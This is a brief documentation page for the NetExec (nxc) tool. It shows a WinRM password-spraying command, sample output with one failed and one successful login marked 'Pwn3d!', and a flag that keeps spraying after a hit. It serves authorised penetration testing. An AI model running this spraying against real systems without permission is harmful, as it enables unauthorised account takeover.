Password Spraying

Password spraying (without bruteforce)

#~ nxc winrm -u userfile -p passwordfile --no-bruteforce

Expected Results:

WINRM 5985   ROGER            [*]
WINRM 5985   ROGER            [-] GOLD\test1:pass1 "Failed to authenticate the user test1 with ntlm"
WINRM 5985   ROGER            [+] GOLD\bonclay:Password@123 (Pwn3d!)

By default nxc will exit after a successful login is found. Using the --continue-on-success flag will continue spraying even after a valid password is found. Usefull for spraying a single password against a large user list.

Last updated